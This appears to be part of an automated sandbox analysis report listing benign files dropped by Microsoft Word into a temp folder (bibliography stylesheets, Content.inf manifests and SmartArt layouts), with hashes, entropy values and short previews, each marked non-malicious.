                                                SHA-512:54AC8732C2744B60DA744E54D74A2664658E4257A136ABE886FF21585E8322E028D8243579D131EF4E9A0ABDDA70B4540A051C8B8B60D65C3EC0888FD691B9A7
                                                Malicious:false
                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.s.o.6.9.0.n.m.e.r.i.c.a.l...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                C:\Users\user\AppData\Local\Temp\TCDF02B.tmp\iso690nmerical.xsl

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):217137
                                                Entropy (8bit):5.068335381017074
                                                Encrypted:false
                                                SSDEEP:6144:AwprA3Z95vtf58pb1WP2DCvCmvQursq7vIme5QyQzSS1apSiQhHDlruvoVeMUwFj:4P
                                                MD5:3BF8591E1D808BCCAD8EE2B822CC156B
                                                SHA1:9CC1E5EFD715BD0EAE5AF983FB349BAC7A6D7BA0
                                                SHA-256:7194396E5C833E6C8710A2E5D114E8E24338C64EC9818D51A929D57A5E4A76C8
                                                SHA-512:D434A4C15DA3711A5DAAF5F7D0A5E324B4D94A04B3787CA35456BFE423EAC9D11532BB742CDE6E23C16FA9FD203D3636BD198B41C7A51E7D3562D5306D74F757
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>...... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parame

                                                C:\Users\user\AppData\Local\Temp\TCDF05B.tmp\Content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):278
                                                Entropy (8bit):3.5280239200222887
                                                Encrypted:false
                                                SSDEEP:6:fxnxUXQAl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyllNGHmD0wbnKYZAH/lMZqiv
                                                MD5:877A8A960B2140E3A0A2752550959DB9
                                                SHA1:FBEC17B332CBC42F2F16A1A08767623C7955DF48
                                                SHA-256:FE07084A41CF7DB58B06D2C0D11BCACB603D6574261D1E7EBADCFF85F39AFB47
                                                SHA-512:B8B660374EC6504B3B5FCC7DAC63AF30A0C9D24306C36B33B33B23186EC96AEFE958A3851FF3BC57FBA72A1334F633A19C0B8D253BB79AA5E5AFE4A247105889
                                                Malicious:false
                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.b...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                C:\Users\user\AppData\Local\Temp\TCDF05B.tmp\gb.xsl

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):268317
                                                Entropy (8bit):5.05419861997223
                                                Encrypted:false
                                                SSDEEP:6144:JwprAJLR95vtfb8p4bgWPzDCvCmvQursq7vImej/yQzSS1apSiQhHDOruvoVeMUh:N9
                                                MD5:51D32EE5BC7AB811041F799652D26E04
                                                SHA1:412193006AA3EF19E0A57E16ACF86B830993024A
                                                SHA-256:6230814BF5B2D554397580613E20681752240AB87FD354ECECF188C1EABE0E97
                                                SHA-512:5FC5D889B0C8E5EF464B76F0C4C9E61BDA59B2D1205AC9417CC74D6E9F989FB73D78B4EB3044A1A1E1F2C00CE1CA1BD6D4D07EEADC4108C7B124867711C31810
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                C:\Users\user\AppData\Local\Temp\TCDF06C.tmp\Content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):290
                                                Entropy (8bit):3.5081874837369886
                                                Encrypted:false
                                                SSDEEP:6:fxnxUXCOzi8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnydONGHmD0wbnKYZAH/lMZqiv
                                                MD5:8D9B02CC69FA40564E6C781A9CC9E626
                                                SHA1:352469A1ABB8DA1DC550D7E27924E552B0D39204
                                                SHA-256:1D4483830710EF4A2CC173C3514A9F4B0ACA6C44DB22729B7BE074D18C625BAE
                                                SHA-512:8B7DB2AB339DD8085104855F847C48970C2DD32ADB0B8EEA134A64C5CC7DE772615F85D057F4357703B65166C8CF0C06F4F6FD3E60FFC80DA3DD34B16D5B1281
                                                Malicious:false
                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.o.s.t.n.a.m.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                C:\Users\user\AppData\Local\Temp\TCDF06C.tmp\gostname.xsl

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):255948
                                                Entropy (8bit):5.103631650117028
                                                Encrypted:false
                                                SSDEEP:6144:gwprAm795vtfb8p4bgWPWEtTmtcRCDPThNPFQwB+26RxlsIBkAgRMBHcTCwsHe5a:kW
                                                MD5:9888A214D362470A6189DEFF775BE139
                                                SHA1:32B552EB3C73CD7D0D9D924C96B27A86753E0F97
                                                SHA-256:C64ED5C2A323C00E84272AD3A701CAEBE1DCCEB67231978DE978042F09635FA7
                                                SHA-512:8A75FC2713003FA40B9730D29C786C76A796F30E6ACE12064468DD2BB4BF97EF26AC43FFE1158AB1DB06FF715D2E6CDE8EF3E8B7C49AA1341603CE122F311073
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="utf-8"?>............<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select=

                                                C:\Users\user\AppData\Local\Temp\TCDF06D.tmp\APASixthEditionOfficeOnline.xsl

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):333258
                                                Entropy (8bit):4.654450340871081
                                                Encrypted:false
                                                SSDEEP:6144:ybW83Zb181+MKHZR5D7H3hgtfL/8mIDbEhPv9FHSVsioWUyGYmwxAw+GIfnUNv5J:i
                                                MD5:5632C4A81D2193986ACD29EADF1A2177
                                                SHA1:E8FF4FDFEB0002786FCE1CF8F3D25F8E9631E346
                                                SHA-256:06DE709513D7976690B3DD8F5FDF1E59CF456A2DFBA952B97EACC72FE47B238B
                                                SHA-512:676CE1957A374E0F36634AA9CFFBCFB1E1BEFE1B31EE876483B10763EA9B2D703F2F3782B642A5D7D0945C5149B572751EBD9ABB47982864834EF61E3427C796
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.. <xsl:output method="html" encoding="us-ascii"/>.... <xsl:template match="*" mode="outputHtml2">.. <xsl:apply-templates mode="outputHtml"/>.. </xsl:template>.... <xsl:template name="StringFormatDot">.. <xsl:param name="format" />.. <xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.. <xsl:when test="$format = ''"></xsl:when>.. <xsl:when test="substring($format, 1, 2) = '%%'">.. <xsl:text>%</xsl:text>.. <xsl:call-template name="StringFormatDot">.. <xsl:with-param name="format" select="substring($format, 3)" />.. <xsl:with-param name=

                                                C:\Users\user\AppData\Local\Temp\TCDF06D.tmp\Content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):328
                                                Entropy (8bit):3.541819892045459
                                                Encrypted:false
                                                SSDEEP:6:fxnxUXuqRDA5McaQVTi8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxny+AASZQoNGHmD0wbnKYZAH/lMZqiv
                                                MD5:C3216C3FC73A4B3FFFE7ED67153AB7B5
                                                SHA1:F20E4D33BABE978BE6A6925964C57D6E6EF1A92E
                                                SHA-256:7CF1D6A4F0BE5E6184F59BFB1304509F38E480B59A3B091DBDC43B052D2137CB
                                                SHA-512:D3B78BE6E7633FF943F5E34063B5EFA4AF239CD49F437227FC7575F6CC65C497B7D6F6A979EA065065BEAF257CB368560B5462542692286052B5C7E5C01755BC
                                                Malicious:false
                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .A.P.A.S.i.x.t.h.E.d.i.t.i.o.n.O.f.f.i.c.e.O.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                C:\Users\user\AppData\Local\Temp\TCDF081.tmp\Content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):290
                                                Entropy (8bit):3.5161159456784024
                                                Encrypted:false
                                                SSDEEP:6:fxnxUX+l8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyulNGHmD0wbnKYZAH/lMZqiv
                                                MD5:C15EB3F4306EBF75D1E7C3C9382DEECC
                                                SHA1:A3F9684794FFD59151A80F97770D4A79F1D030A6
                                                SHA-256:23C262DF3AEACB125E88C8FFB7DBF56FD23F66E0D476AFD842A68DDE69658C7F
                                                SHA-512:ACDF7D69A815C42223FD6300179A991A379F7166EFAABEE41A3995FB2030CD41D8BCD46B566B56D1DFBAE8557AFA1D9FD55143900A506FA733DE9DA5D73389D6
                                                Malicious:false
                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .t.u.r.a.b.i.a.n...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                C:\Users\user\AppData\Local\Temp\TCDF081.tmp\turabian.xsl

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):344303
                                                Entropy (8bit):5.023195898304535
                                                Encrypted:false
                                                SSDEEP:6144:UwprANnsqvtfL/vF/bkWPRMMv7EOMBPitjASjTQQr7IwR0TnyDk1b78plJwf33iD:6
                                                MD5:F079EC5E2CCB9CD4529673BCDFB90486
                                                SHA1:FBA6696E6FA918F52997193168867DD3AEBE1AD6
                                                SHA-256:3B651258F4D0EE1BFFC7FB189250DED1B920475D1682370D6685769E3A9346DB
                                                SHA-512:4FFFA59863F94B3778F321DA16C43B92A3053E024BDD8C5317077EA1ECC7B09F67ECE3C377DB693F3432BF1E2D947EC5BF8E88E19157ED08632537D8437C87D6
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$pa

                                                C:\Users\user\AppData\Local\Temp\TCDF092.tmp\BracketList.glox

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):4026
                                                Entropy (8bit):7.809492693601857
                                                Encrypted:false
                                                SSDEEP:96:VpDCBFLhxaUGm5EWA07yNdKH1FQpy8tnX8Iz3b7TrT502+fPD:VpDYFFRMNU+RtXzLf35t+3D
                                                MD5:5D9BAD7ADB88CEE98C5203883261ACA1
                                                SHA1:FBF1647FCF19BCEA6C3CF4365C797338CA282CD2
                                                SHA-256:8CE600404BB3DB92A51B471D4AB8B166B566C6977C9BB63370718736376E0E2F
                                                SHA-512:7132923869A3DA2F2A75393959382599D7C4C05CA86B4B27271AB9EA95C7F2E80A16B45057F4FB729C9593F506208DC70AF2A635B90E4D8854AC06C787F6513D
                                                Malicious:false
                                                Preview:PK........YnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........bnB;?.......f......._rels/.rels...J.1.._%..f....m/.,x...&.lt.dV.y.|.."v....q..|......r..F..)..;.T5g.eP..O..Z.^-.8...<.Y....Q.."....*D.%.!9.R&#".'0(.u}).!..l....b..J..rr....P.L.w..0.-......A..w..x.7U...Fu<mT.....^s...F./ ..( .4L..`.....}...O..4.L...+H.z...m..j[].=........oY}.PK........J.L6...m....,.......diagrams/layout1.xml.X.n.8.}N.....PG.............wZ.,.R.%.K...J.H]....y.3..9...O..5."J.1.\.1....Q....z......e.5].)...$b.C)...Gx!...J3..N..H...s....9.~...#..$...W.8..I`|..0xH}......L.|..(V;..1...kF..O=...j...G.X.....T.,d>.w.Xs.......3L.r..er\o..D..^....O.F.{:.>.R'....Y-...B.P.;....X.'c...{x*.M7..><l.1.w..{].46.>.z.E.J.......G......Hd..$..7....E.

                                                C:\Users\user\AppData\Local\Temp\TCDF092.tmp\Content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):250
                                                Entropy (8bit):3.4916022431157345
                                                Encrypted:false
                                                SSDEEP:6:fxnxUXsAl8xoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny8A8xoGHmD0+dAH/luWvv
                                                MD5:1A314B08BB9194A41E3794EF54017811
                                                SHA1:D1E70DB69CA737101524C75E634BB72F969464FF
                                                SHA-256:9025DD691FCAD181D5FD5952C7AA3728CD8A2CAF20DEA14930876419BED9B379
                                                SHA-512:AB29C8674A85711EABAE5F9559E9048FE91A2F51EB12D5A46152A310DE59F759DF8C617DA248798A7C20F60E26FBB1B0FC8DB47C46B098BCD26CF8CE78989ACA
                                                Malicious:false
                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.r.a.c.k.e.t.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                C:\Users\user\AppData\Local\Temp\TCDF093.tmp\Content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):314
                                                Entropy (8bit):3.5230842510951934
                                                Encrypted:false
                                                SSDEEP:6:fxnxUXJuJaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyZuUw9eNGHmD0wbnKYZAH/lMZqiv
                                                MD5:F25AC64EC63FA98D9E37782E2E49D6E6
                                                SHA1:97DD9CFA4A22F5B87F2B53EFA37332A9EF218204
                                                SHA-256:834046A829D1EA836131B470884905856DBF2C3C136C98ADEEFA0F206F38F8AB
                                                SHA-512:A0387239CDE98BCDE1668B582B046619C3B3505F9440343DAD22B1B7B9E05F3B74F2AE29E591EC37B6570A0C0E5FE571442873594B0684DDCCB4F6A1B5E10B1F
                                                Malicious:false
                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .i.e.e.e.2.0.0.6.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                C:\Users\user\AppData\Local\Temp\TCDF093.tmp\ieee2006officeonline.xsl

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):294178
                                                Entropy (8bit):4.977758311135714
                                                Encrypted:false
                                                SSDEEP:6144:ydkJ3yU0orh0SCLVXyMFsoiOjWIm4vW2uo4hfhf7v3uH4NYYP4BpBaZTTSSamEUD:b
                                                MD5:0C9731C90DD24ED5CA6AE283741078D0
                                                SHA1:BDD3D7E5B0DE9240805EA53EF2EB784A4A121064
                                                SHA-256:ABCE25D1EB3E70742EC278F35E4157EDB1D457A7F9D002AC658AAA6EA4E4DCDF
                                                SHA-512:A39E6201D6B34F37C686D9BD144DDD38AE212EDA26E3B81B06F1776891A90D84B65F2ABC5B8F546A7EFF3A62D35E432AF0254E2F5BFE4AA3E0CF9530D25949C0
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt"......xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">.....<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="/">....<xsl:call-template name="Start"/>...</xsl:template>.....<xsl:template name="Start">....<xsl:choose>.....<xsl:when test="b:Version">......<xsl:text>2010.2.02</xsl:text>.....</xsl:when>.......<xsl:when test="b:XslVersion">......<xsl:text>2006</xsl:text>.....</xsl:when>.. <xsl:when test="b:StyleNameLocalized">.. <xsl:choose>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1033'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameLocalized/b:Lcid='1025'">.. <xsl:text>IEEE</xsl:text>.. </xsl:when>.. <xsl:when test="b:StyleNameL

                                                C:\Users\user\AppData\Local\Temp\TCDF0B8.tmp\Content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):258
                                                Entropy (8bit):3.4692172273306268
                                                Encrypted:false
                                                SSDEEP:6:fxnxUXcq9DsoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnysmYoGHmD0+dAH/luWvv
                                                MD5:C1B36A0547FB75445957A619201143AC
                                                SHA1:CDB0A18152F57653F1A707D39F3D7FB504E244A7
                                                SHA-256:4DFF7D1CEF6DD85CC73E1554D705FA6586A1FBD10E4A73EEE44EAABA2D2FFED9
                                                SHA-512:0923FB41A6DB96C85B44186E861D34C26595E37F30A6F8E554BD3053B99F237D9AC893D47E8B1E9CF36556E86EFF5BE33C015CBBDD31269CDAA68D6947C47F3F
                                                Malicious:false
                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .p.i.c.t.u.r.e.o.r.g.c.h.a.r.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                C:\Users\user\AppData\Local\Temp\TCDF0B8.tmp\pictureorgchart.glox

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Microsoft OOXML
                                                Category:dropped
                                                Size (bytes):7370
                                                Entropy (8bit):7.9204386289679745
                                                Encrypted:false
                                                SSDEEP:192:fYa+ngK2xG6HvLvoUnXxO+blKO1lt2Zg0AV:fYVn8Y6Hv3XxO+8uQZCV
                                                MD5:586CEBC1FAC6962F9E36388E5549FFE9
                                                SHA1:D1EF3BF2443AE75A78E9FDE8DD02C5B3E46F5F2E
                                                SHA-256:1595C0C027B12FE4C2B506B907C795D14813BBF64A2F3F6F5D71912D7E57BC40
                                                SHA-512:68DEAE9C59EA98BD597AE67A17F3029BC7EA2F801AC775CF7DECA292069061EA49C9DF5776CB5160B2C24576249DAF817FA463196A04189873CF16EFC4BEDC62
                                                Malicious:false
                                                Preview:PK........;nB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........HnB;..I)....j......._rels/.rels...J.@.._e..&6E.i/.,x..Lw'.j........G..\...................)...Y.3)..`...9r{v!......z...#>5.g.WJ%..T..>'m ..K.T.....j6[(:f.)S....C.mk5^.=:...X......C.... I......&5..e..H.1...).P.cw.kjT......C.......=.....}G!7E.y$.(...}b.........b=.<..^.....U..Y..PK.........^5a.2u............diagrams/layout1.xml..ko.8..+x.t.l..J.n.t.Mnw.x. ....B.t$.,.(&i.....(..d.mY......g.../[.<!.{ap>...L...p....G.9z?...._...e..`..%......8....G!..B8.....o...b.......Q.>|.......g..O\B...i.h...0B.}.....z...k...H..t~r.v........7o.E....$....Z.........ZDd..~......>......O.3.SI.Y.".O&I....#."._c.$.r..z.g0`...0...q:...^0.EF...%(.Ao$.#.o6..c'....$%.}

                                                C:\Users\user\AppData\Local\Temp\TCDF0CD.tmp\Content.inf

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):280
                                                Entropy (8bit):3.484503080761839
                                                Encrypted:false
                                                SSDEEP:6:fxnxUXGdQ1MecJZMlWlk2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny2dQ98MlWlzGHmD0+dAH/luWvv
                                                MD5:1309D172F10DD53911779C89A06BBF65
                                                SHA1:274351A1059868E9DEB53ADF01209E6BFBDFADFB
                                                SHA-256:C190F9E7D00E053596C3477455D1639C337C0BE01012C0D4F12DFCB432F5EC56
                                                SHA-512:31B38AD2D1FFF93E03BF707811F3A18AD08192F906E36178457306DDAB0C3D8D044C69DE575ECE6A4EE584800F827FB3C769F98EA650F1C208FEE84177070339
                                                Malicious:false
                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .I.n.t.e.r.c.o.n.n.e.c.t.e.d.B.l.o.c.k.P.r.o.c.e.s.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                C:\Users\user\AppData\Local\Temp\TCDF0CD.tmp\InterconnectedBlockProcess.glox

                                                Download File
                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                Category:dropped
                                                Size (bytes):9191
                                                Entropy (8bit):7.93263830735235
                                                Encrypted:false
                                                SSDEEP:192:oeAMExvPJMg+yE+AfJLi3+Xoj7F3sPgMG61J88eDhFWT7hFNsdJtnLYJ7tSh:v2d+hnfJLi3+4ja4WqhFWT7FsdHMA
                                                MD5:08D3A25DD65E5E0D36ADC602AE68C77D
                                                SHA1:F23B6DDB3DA0015B1D8877796F7001CABA25EA64
                                                SHA-256:58B45B9DBA959F40294DA2A54270F145644E810290F71260B90F0A3A9FCDEBC1
                                                SHA-512:77D24C272D67946A3413D0BEA700A7519B4981D3B4D8486A655305546CE6133456321EE94FD71008CBFD678433EA1C834CFC147179B31899A77D755008FCE489
                                                Malicious:false
